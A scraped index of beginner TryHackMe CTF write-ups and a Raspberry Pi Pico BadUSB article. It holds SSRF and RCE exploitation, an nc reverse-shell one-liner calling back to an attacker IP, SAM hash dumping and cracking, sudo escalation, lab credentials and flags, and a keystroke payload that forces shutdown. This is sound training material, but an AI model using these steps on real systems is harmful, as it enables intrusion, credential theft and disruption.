I’ve broken it down in a way that hopefully makes it easier to follow — especially as I worked through it alongside a colleague to better understand each step.\nIf you’re stuck at any point or have questions about a step, feel free to drop a comment — I’ll make sure to walk you through it.\n","date":"26 June 2025","externalUrl":null,"permalink":"/writeups/overthewire/over-the-wire-leviathan/","section":"Security Labs \u0026 Writeups","summary":"","title":"OVER THE WIRE — LEVIATHAN","type":"writeups"},{"content":"","date":"26 June 2025","externalUrl":null,"permalink":"/writeups/overthewire/","section":"Security Labs \u0026 Writeups","summary":"","title":"OverTheWire Wargames","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “MD2PDF” MD2PDF-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “MD2PDF”\nThis room is classified as an easy room. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe begin by visiting the victim IP Address:\nhttp://10.10.152.252Here, the application provides a text box where we can input content (Markdown), and then convert it into a PDF by clicking a “Process” button.\nOnce processed, a new browser tab opens showing the PDF version of what you entered. 
This tells us right away that:\nThe application is rendering your input on the server side into a PDF.\nNow launching nmap and feroxbuster:\nnmap -O -sV 10.10.152.252Shows standard HTTP service, no unexpected open ports on the surface\nferoxbuster -u http://10.10.152.252 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtand through this we see :\n/admin\nThen we follow this : http://10.10.152.252/admin\nIt shows forbidden and even the local host port 5000 is prompted so we try the same yet nothing but a small version text box\nhttp://10.10.152.252:5000/admin\nUnderstanding the working:\nIt takes user input (Markdown or HTML).It renders this content server-side into a PDF.The rendered content could include HTML tags like \u0026lt;iframe\u0026gt;, \u0026lt;img\u0026gt;, etc.So if we embed a link to a local resource (like localhost:5000), and if the renderer fetches and embeds that, we have a working SSRF (Server-Side Request Forgery)Here’s the payload used:\n\u0026lt;iframe src=”http://localhost:5000/admin”\u0026gt;\u0026lt;/iframe\u0026gt;\n\u0026lt;iframe\u0026gt; allows embedding another page inside your current document.When the PDF is rendered server-side, the application fetches content from the provided src.Since localhost refers to the server’s own loopback address, this effectively tricks the server into sending a request to its internal admin page — a request you cannot make directly.Now when this payload is pasted here, the internal /admin page is embedded right inside the rendered document.\nInside the PDF, the flag is revealed:\nflag{1f4a2b6ffeaf4707c43885d704eaee4b}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. 
I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"22 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/md2pdf-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"MD2PDF-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a very easy room from the TryHackMe platform titled “Cyber Heroes” CYBER HEROES-TRY HACK ME-ROOMHello everyone! This is a very easy room from the TryHackMe platform titled “Cyber Heroes”\nThis room is classified as easy and is actually super easy. I hope this write-up helps guide you through the process!\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nWe begin by visiting the target IP provided by the TryHackMe room:\nYou’ll see a styled landing page, possibly superhero-themed — but nothing visibly useful at first glance.\nNext I Click the “Login” button in the top navigation bar to reach the login form.\nTried some common default credentials like:\nadmin / admin test / testbut no luck.\nTime to inspect the login page source.\nLooking through I found this :\na.value == “h3ck3rBoi” \u0026amp;\u0026amp; b.value == RevereString(“54321@terceSrepuS”)\nThis shows us the login is validated client-side (bad practice), and the credentials are hardcoded in JavaScript!\nThere’s a function RevereString() being used on the password — clearly a typo for ReverseString().\nNow reverse the String:\nReverse of “54321@terceSrepuS” → SuperSecret@12345\nFinal credentials:\nUsername: h3ck3rBoiPassword: SuperSecret@12345Log in using the credentials above.\nYou’re redirected to a page that immediately reveals the flag:\nflag{edb0be532c540b1a150c3a7e85d2466e}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"17 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/cyber-heroes-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"CYBER HEROES-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Agent T” AGENT T-TRY HACK ME-ROOMHello everyone! 
This is a beginner-friendly room from the TryHackMe platform titled “Agent T”\nThis room is classified as an easy-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, head to the target IP in your browser:\nhttp://10.10.50.173The page loads — but it’s blank or just shows a generic page. Nothing to work with in the UI.\nInspect the HTML/JS — but there’s nothing significant to grab on to.\nTime for deeper recon.\nSo we scan the target\nnmap -O -sV 10.10.50.173and from the result we see this:\n80/tcp open httpPHP cli server 5.5 or later (PHP 8.1.0-dev)\nThat PHP 8.1.0-dev version is here. Let’s see if there’s an exploit.\nNow going to the browser I search up: PHP 8.1.0 exploit and I find it on Exploit-DB\nOffSec's Exploit Database ArchivePHP 8.1.0-dev - 'User-Agentt' Remote Code Execution.. 
webapps exploit for PHP platformwww.exploit-db.comIt’s a Remote Code Execution (RCE) exploit that abuses the insecure User-Agent header handling in this PHP dev server.\nThen back to our terminal we create an empty file and copy the exploit and paste it there\nnano agenttexp.pyBefore you can run it, you need to give it execute permission\nchmod +x agenttexp.pyThe chmod makes the file executable, allowing you to run it like a program or script.\nNow run the exploit:\npython3 agenttexp.pyIt asks for the target URL:\nwe paste it in:\nhttp://10.10.50.173/Boom — shell access granted!\nNow we try this :\npwdls -laNothing useful in the current directory.\nSo we explore the root directory:\nls /and flag.txt catches my eyes\nNow you may wonder why ls/ ?\nls -la lists files in your current directory only.ls / shows the top-level directory structure — i.e., files and folders in /, the root.Unless you’re already in /, you won’t see flag.txt with ls -la\nOnce we know the flag is in /, we use\ncat /flag.txtand get the flag:\nflag{4127d0530abf16d6d23973e3df8dbecb}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"15 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/agent-t-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"AGENT T-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Blueprint” BLUEPRINT — THM CTF — WRITEUPHello everyone! 
This is a beginner-friendly room from the TryHackMe platform titled “Blueprint”\nThis room is classified. It took me a bit to complete and was a fun room, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nAs the victim IP shows a negative website\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a web page with some image and text.\nI initiate an Nmap scan and run a Feroxbuster scan\nnmap 10.10.66.49 -Oferoxbuster -u http://10.10.66.49 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtNo fruitful results from Ferox, but browsing manually under 8080 reveals a directory of files.\nhttp://10.10.66.49:8080Click around and look through the available documentation. One term stands out:\nosCommerce\nA quick Google search confirms: osCommerce 2.3.4 is vulnerable to Remote Command Execution (RCE).\nFound this GitHub repo for the exploit:\nGitHub - nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution: osCommerce 2.3.4 Remote Command…osCommerce 2.3.4 Remote Command Execution. Contribute to nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution…github.comFirst, clone the repository:\ngit clone https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution.gitcd osCommerce-2.3.4-Remote-Command-ExecutionBased on the GitHub README, target the /catalog/ subdirectory.\nRun the exploit with:\npython3 osCommerce2_3_4RCE.py http://10.10.66.49:8080/oscommerce-2.3.4/catalog/Command prompt appears. 
Try:\nwhoamiNow, Generate a PowerShell reverse shell payload using RevShells:\nChoose: PowerShell Base64 (PowerShell v3)Replace IP with your local tun0 IPChoose a port (e.g., 4445)Start a listener:\nnc -lvnp 4445Paste the generated reverse shell payload into the RCE shell.\nBoom — shell connected.\nUse cd .. repeatedly to reach the base drive, then:\ncd Userscd Administratorcd Desktopcat root.txt.txtThen we get the Flag:\nTHM{aea1e3ce6fe7f89e10cea833ae009bee}You’re on a Windows machine, and Windows stores password hashes in the registry under:\nC:\\Windows\\System32\\config\\SAMC:\\Windows\\System32\\config\\SYSTEMWe’re going to dump these keys using reg save via RCE:\ncd Xamppcd htdocscd oscommerce-2.3.4reg save HKLM\\SAM sam.hivreg save HKLM\\SYSTEM system.hivNow browse to the /oscommerce-2.3.4/ directory from the browser to download both files.\nMove into your download folder and run:\nsamdump2 system.hiv sam.hivOutput:\naad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450\nThe left hash is a blank LM hashThe right one is the NTLM hashCrack it on CrackStation or using John:\n30e87bf999828446a1c1209ddde4c450 → googleplusgoogleplusConclusionI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"10 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/blueprint-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"BLUEPRINT — THM CTF — WRITEUP","type":"writeups"},{"content":" Hello everyone! 
This is a beginner-friendly room from the TryHackMe platform titled “Lazy Admin.” Lazy Admin— TryHackMe — CTF WriteupHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Lazy Admin.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nLet’s start with basic service detection and directory brute-forcing:\nnmap 10.10.61.218 --openOpen ports:\n22 (SSH)80 (HTTP)Now let’s enumerate web directories\nferoxbuster -u http://10.10.61.218/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtDiscovered:\n/content/content/imagesWe visit /content and recognize the SweetRice CMS UI.\nSweet!\nNow time to dig into it:\nffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.10.61.218/content/FUZZFindings:\n/inc directory has a SQLite DB fileDownload and inspect:\nwget http://10.10.61.218/content/inc/config.dbOpen it in Mousepad or any SQLite browser. 
Use Ctrl+F to find credentials.\nFound this in the DB:\nadmin\\”;s:7:\\”manager\\”;s:6:\\”passwd\\”;s:32:\\”42f749ade7f9e195bf475f37a44cafcb\nThe hash type is: MD5\nCrack it on crackstation.net → Password123\nCredentials:\nUsername: managerPassword: Password123Now time to use a reverse shell:\nTo send it as a php5 file we rename it:\nmv php-reverse-shell.php php-reverse-shell.php5Search for known exploit:\nsearchsploit sweetricewe use:\nSweetRice 1.5.1 — Arbitrary File Upload — php/webapps/40716.pyCopy and run it:\nsearchsploit -m php/webapps/40716.pypython3 40716.pyEnter the following when prompted:\nURL: http://10.10.61.218/content/User: managerPass: Password123Shell file: php-reverse-shell.php5In a new terminal, opening a listener:\nnc -lvnp 1234Now trigger the shell by visiting:\nhttp://10.10.61.218/content/attachment/php-reverse-shell.php5\nBOOM! — We have the shell\nNow :\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’Breakdown:\nUsed to upgrade a limited shell to a fully interactive TTY, enabling all featurespython3 -c: Runs Python code passed as a string.import pty: Loads the pty module (used for pseudo-terminals).pty.spawn(\"/bin/bash\"): Spawns a fully interactive Bash shell.Next searching for the user flag:\ncd /homecat user.txtNow escalating the privileges:\nsudo -lOutput:\n(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl\nCheck the contents:\ncat /home/itguy/backup.pl\nOutput:\n#!/usr/bin/perlsystem(“sh”, “/etc/copy.sh”);\nThen:\ncat /etc/copy.sh\nIt already has a reverse shell format. Replace with your own IP:\necho ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc 10.x.x.xxx 5554 \u0026gt;/tmp/f’ \u0026gt; /etc/copy.shNow setting up the listener:\nnc -lvnp 5554Now run the Perl script:\nsudo /usr/bin/perl /home/itguy/backup.plBOOM! we are root\ncd /rootcat root.txtTHM{63e5bce9271952aad1113b6f1ac28a07}THM{6637f41d0177b6f37cb20d775124699f}CONCLUSION :I hope this write-up walkthrough was helpful to you all! 
This room covered CMS Enumeration, Authenticated file upload exploit and SSH Privilege Escalation.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next write-up!\n","date":"8 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/lazy-admin-tryhackme-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"Lazy Admin— TryHackMe — CTF Writeup","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Agent Sudo.” Agent Sudo— TryHackMe — CTF WriteupHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Agent Sudo.”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nWe start with the nmap scan:\nnmap 10.10.132.168 --openThe open ports:\n21 (FTP)22 (SSH)80 (HTTP)Webpage loads but isn’t helpful up front — mentions codenames and agent themes.\nLet’s scan with feroxbuster:\nferoxbuster -u http://10.10.132.168 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtNothing useful, so let’s try header injection on the homepage using Burp Suite.\nCapture the request to / and add a header in the User-Agent field using Burp Repeater:\nUser-Agent: CMessage received:\nAgent name: ChrisWeak password warningNext we try FTP using this:\nTry anonymous login first → fails.\nUse Hydra to brute-force FTP creds for user chris:\nhydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.132.168Cracked:\nUsername: chrisPassword: crystalNow let’s log in:\nftp 10.10.132.168Get these files:\nTo_agentJ.txtcutie.pngcute-alien.jpgNow we analyze the content of the files:\ncat To_agentJ.txt{Gives a hint that Agent J (james) has sensitive data}\nI also check the jpg for steganography:\nsteghide --info cute-alien.jpgIt’s password-protected. Use stegseek with rockyou.txt:\nstegseek cute-alien.jpg /usr/share/wordlists/rockyou.txtPassphrase: Area51\nOutput file: cute-alien.jpg.out\ncat cute-alien.jpg.outFound credentials:\nUsername: jamesPassword: hackerrules!Now to analyze cutie.png, we run binwalk:\nbinwalk -e cutie.png --run-as=rootcd _cutie.png.extracted/We find a zip file (8702.zip). 
Crack it:\n7z e 8702.zipSince it is password-protected, we crack it using john:\nzip2john 8702.zip \u0026gt; hashjohn hash --wordlist=/usr/share/wordlists/rockyou.txtPassword: alien\nNow accessing James through SSH:\nssh james@10.10.132.168Use password: hackerrules!\nGet the user flag:\ncat user.txtNext we analyze the image:\nscp james@10.10.132.168:Alien_autopsy.jpg ~/Downloads/Search the image online — it is identified as the Roswell alien autopsy photo, hinting at cover-up themes and classic alien conspiracy.\nNow privilege escalation:\nCheck sudo permissions:\nsudo -lOutput:\n(ALL, !root) /bin/bash\nThis is vulnerable to CVE-2019-14287 — the user can bypass the root restriction using -u#-1\nsudo -u#-1 /bin/bash -iBoom!\ncd /rootcat root.txtAgent name: DeskelFlags:\nB03d975e8c92a7c04146cfa7a5a313c7Roswell alien autopsyCVE-2019-14287B53a02f55b57d4439e3341834d70c062DesKelCONCLUSION:I hope this write-up walkthrough was helpful to you all! This room covered FTP Enumeration, Password Hash Cracking, and SSH Privilege Escalation.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next write-up!\n","date":"3 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/agent-sudo-tryhackme-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"Agent Sudo— TryHackMe — CTF Writeup","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Gotta Catch’em All!” GOTTA CATCH’EM ALL — TRY HACK ME — ROOMHello everyone! 
This is a beginner-friendly room from the TryHackMe platform titled “Gotta Catch’em All!”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 15 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nThrowing Bullets not PokeBallsWe start by checking the page out and it’s a basic default Apache page.\nWe try using feroxbuster but there is no positive result.\nAnd at the same time:\nnmap 10.10.0.73 --openResults:\nPort 22 (SSH)Port 80 (HTTP)Now let’s go back and take a look at the web interface.\nAfter seeing no result on the webpage we check the dev tools and see something:\n👀 Console Hint: A bunch of Pokémon names and a line like this:\n\u0026lt;some_pokemon\u0026gt;:\u0026lt;hack_the_pokemon\u0026gt;\nAlso, an IP \u0026amp; port string: 10.10.0.73:202:14 — likely a red herring, because ports 202 and 14 aren’t open.\nBut the format username:password gives us what we need!\nFrom the hint, we get:\nUsername: pokemonPassword: hack_the_pokemon\nTry logging in:\nssh pokemon@10.10.0.73Success! 
You’re in as user pokemon\nwe perform ls -la*\npokemon@root:~$ ls -la *\n-rw-r--r-- 1 pokemon pokemon 8980 Jun 22 2020 examples.desktop\nDesktop:\ntotal 12\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 24 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\n-rw-rw-r-- 1 pokemon pokemon 383 Jun 22 2020 P0kEmOn.zip\nDocuments:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nDownloads:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nMusic:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nPictures:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nPublic:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nTemplates:\ntotal 8\ndrwxr-xr-x 2 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\nVideos:\ntotal 12\ndrwxr-xr-x 3 pokemon pokemon 4096 Jun 22 2020 .\ndrwxr-xr-x 19 pokemon pokemon 4096 Mar 28 11:09 ..\ndrwxrwxr-x 3 pokemon pokemon 4096 Jun 22 2020 Gotta\nNow to get the flags, first grass type :\ncd Desktopunzip P0kEmOn.zipcd P0kEmOncat grass-type.txtHex Encoded:\n50 6f 4b 65 4d 6f 4e 7b 42 75 6c 62 61 73 61 75 72 7d\nDecode using any hex tool\nPoKeMoN{Bulbasaur}To make it easier we try searching and finding the other type of files:\nfind / -name “*-type.txt” 2\u0026gt;/dev/nullwe get:\n/var/www/html/water-type.txt/etc/why_am_i_here?/fire-type.txt\nSo for water type pokemon:\ncd /var/www/htmlcat water-type.txtResult:\nEcgudfxq_EcGmP{Ecgudfxq}\nLooks like ROT13\nUse dcode.fr or similar tool → Decode ROT13\nSquirtle_SqUaD{Squirtle}Next fire type:\ncd /etc/why_am_i_here?cat fire-type.txtUDBrM20wbntDaGFybWFuZGVyfQ==\nI immediately know it’s base 64\nP0k3m0n{Charmander}Now privilege escalation — Let’s figure out who the root user 
could be…\nExploring the user’s folders:\ncd Videos/Gotta/Catch/Them/ALL!lswe see a suspicious file:\nCould_this_be_what_Im_looking_for?.cplusplus\nI inspect it:\ncat Could_this_be_what_Im_looking_for?.cplusplusC++ snippet output appears:\nstd::cout \u0026lt;\u0026lt; “ash : pikapika”And those are our credentials for root.\nAs we know ash is the other user, so it’s time to switch to that account:\nsu ashPassword: pikapikaOnce in,\nsudo sucd /rootcat roots-pokemon.txtBOOM!\nThe final flag is found:\nPikachu!CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nThis was a relatively easy room.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"1 June 2025","externalUrl":null,"permalink":"/writeups/tryhackme/gotta-catch-em-all-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"GOTTA CATCH’EM ALL — TRY HACK ME — ROOM","type":"writeups"},{"content":" What is Pico Bad USB? 
Introduction to Basics of Bad USBWhat is Pico Bad USB?The Raspberry Pi Pico is a small and inexpensive microcontroller with USB functionality, which can be easily programmed to emulate different types of USB devices like keyboards or mice.\nThis ability allows the Raspberry Pi Pico to behave like a malicious USB device when plugged into a computer.\nOnce connected, the Pico can automatically execute pre-programmed actions, such as running commands, opening applications, or modifying system settings.\nHow Does Pico Bad USB Work?USB Emulation: The Raspberry Pi Pico, with its USB host capability, can be programmed to emulate various USB devices like a keyboard, mouse, or even a storage device. When plugged into a computer, it tricks the system into thinking it is a legitimate device.Payload Execution: Once the Pico is connected, the script or payload stored in its memory is triggered. For example, it could simulate pressing specific keys to open a terminal or command prompt and execute a series of commands. These commands can range from harmless tasks (like opening applications) to malicious actions (like creating new system users or running malware).Autonomous Operation: Since the Raspberry Pi Pico is programmable, it operates autonomously once plugged into the system. There’s no need for the user to do anything beyond inserting the USB device. It begins executing its payload automatically, without any prompts or warnings to the user.System Manipulation: The commands or actions triggered by the payload can vary depending on the attacker’s goals. 
For instance:Keystroke Injection: The Pico might simulate keyboard input to execute commands, install malware, or open applications.Mouse Movements: It could simulate mouse movements and clicks to interact with the system’s interface without the user’s knowledge.Command Execution: It could open a terminal or command prompt and run malicious scripts or commands on the system.The Logic Behind Pico Bad USBThe logic of Pico Bad USB is based on exploiting the USB Human Interface Device (HID) protocol.\nThe HID protocol is commonly used for devices like keyboards, mice, and game controllers.\nThe Raspberry Pi Pico can be programmed to emulate these HID devices, and because HID devices are trusted by operating systems, they are granted permissions to execute commands without user intervention.\nThe core logic behind a Bad USB attack using the Pico works as follows:\nThe Pico is plugged into the target system as a USB device.The Pico’s firmware is programmed with a series of commands (a payload).Once connected, the payload is executed automatically.The payload sends instructions to the operating system (e.g., through keystrokes or mouse movements) to perform actions such as opening a terminal, running commands, or interacting with the system.The system follows these instructions without question, as it assumes the inputs are coming from a legitimate USB device.Some Simple Educational PayloadsTo find the system infoDELAY 500WINDOWS rDELAY 500STRING cmdENTERDELAY 1000CTRL-SHIFT ENTERDELAY 2000STRING systeminfoDELAY 1000ENTERDELAY 500: Wait 0.5 seconds (to ensure the system is ready).WINDOWS r: Simulates pressing Windows + R, which opens the Run dialog.DELAY 500: Wait another 0.5 seconds (to ensure the Run window is open).STRING cmd: Types \"cmd\" into the Run dialog.ENTER: Simulates pressing Enter, which opens Command Prompt in normal mode.DELAY 1000: Wait 1 second.CTRL-SHIFT ENTER: Simulates pressing Ctrl + Shift + Enter, which is a shortcut to run a program (like CMD) as 
an administrator.DELAY 2000: Wait 2 seconds to allow the User Account Control (UAC) prompt to appear (though actual elevation may require manual approval).STRING systeminfo: Types the command systeminfo, which displays detailed configuration info about the computer.DELAY 1000: Waits 1 second before proceeding.ENTER: Executes the systeminfo command, listing OS version, BIOS version, RAM, etc.2. Open PowerShell\nDELAY 500GUI r DELAY 500STRING powershell ENTERDELAY 500STRING Get-ProcessENTERDELAY 500: Waits 0.5 seconds before starting (to ensure system readiness).GUI r: Simulates pressing Windows + R to open the Run dialog.DELAY 500: Waits 0.5 seconds for the Run window to appear.STRING powershell: Types powershell into the Run dialog box.ENTER: Presses Enter, which launches PowerShell in standard (non-admin) mode.DELAY 500: Waits 0.5 seconds for PowerShell to fully open.STRING Get-Process: Types the PowerShell command Get-Process, which lists all running processes.ENTER: Executes the command in PowerShell, showing active processes (similar to Task Manager).3. The next is a fun one which I worked on, and it is to shut down systems:\nDELAY 500WINDOWS rDELAY 500STRING cmdENTERDELAY 1000CTRL-SHIFT ENTERDELAY 3000STRING echo “Thanks from 5kullk3r! Entering shutdown”ENTERDELAY 500STRING shutdown /s /f /t 5ENTERDELAY 500: Waits 0.5 seconds to ensure the system is stable before executing actions.WINDOWS r: Presses Windows + R to open the Run dialog.DELAY 500: Waits 0.5 seconds for the Run dialog to appear.STRING cmd: Types cmd to launch Command Prompt.ENTER: Presses Enter to open the Command Prompt.DELAY 1000: Waits 1 second for CMD to load.CTRL-SHIFT ENTER: Attempts to launch Command Prompt as administrator.DELAY 3000: Waits 3 seconds to allow for UAC handling and CMD to load in admin mode.STRING echo \"Thanks for using! 
Entering self-destruct mode...\":Types a message to display to the user.ENTER:Executes the echo command, printing the message to the console.DELAY 500:Waits 0.5 seconds before the next command.STRING shutdown /s /f /t 5: Types a shutdown command:/s – shuts down the computer,/f – forces running applications to close,/t 5 – sets a 5-second countdown before shutdown.ENTER:Executes the shutdown command.DisclaimerThis is a personal project created for my own learning and exploration, shared solely for educational and research purposes.\nIt reflects my individual journey in cybersecurity and aims to promote ethical practices.\nAll content is provided for educational use only and must not be used for unauthorized, malicious, or illegal activities.\nIf you choose to use this material, you are solely responsible for ensuring your actions are legal, authorized, and ethical.\nI assume no responsibility or liability for any consequences resulting from the misuse or improper application of this content.\nCONCLUSION :I hope this write-up walkthrough was helpful to you all! This small article talked about rubber ducky and a few basic scripts\nI will be back with the rooms from the coming week. If you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next write-up!\n","date":"27 May 2025","externalUrl":null,"permalink":"/articles/technisch/introduction-to-basics-of-bad-usb/","section":"Security Research \u0026 Articles","summary":"","title":"Introduction to Basics of Bad USB","type":"articles"},{"content":"","date":"27 May 2025","externalUrl":null,"permalink":"/articles/technisch/","section":"Security Research \u0026 Articles","summary":"","title":"Technische Arbeit","type":"articles"},{"content":" Disclaimer Trusting the Wrong Device — A Hands-On Cybersecurity BreakdownDisclaimerThis is a personal project created for my own learning and exploration, shared solely for educational and research purposes.\nIt reflects my individual journey in cybersecurity and aims to promote ethical practices.\nAll content is provided for educational use only and must not be used for unauthorized, malicious, or illegal activities.\nIf you choose to use this material, you are solely responsible for ensuring your actions are legal, authorized, and ethical.\nI assume no responsibility or liability for any consequences resulting from the misuse or improper application of this content.\nHUMAN INTERFACE DEVICESIn January 2022, the FBI issued an urgent security alert regarding a new campaign by the infamous cybercrime group FIN7.\nFIN7 groupThe group was conducting a physically distributed USB-based attack, mailing malicious flash drives directly to employees at U.S. defense contractors, transportation companies, and insurance providers.\nThese weren’t ordinary thumb drives.\nBest Buy gift card containing a malicious USB deviceThe packages were professionally crafted — complete with fake Amazon and Best Buy branding, sometimes including congratulatory letters, thank-you notes, or even phony COVID-19 guidelines.\nThe goal? 
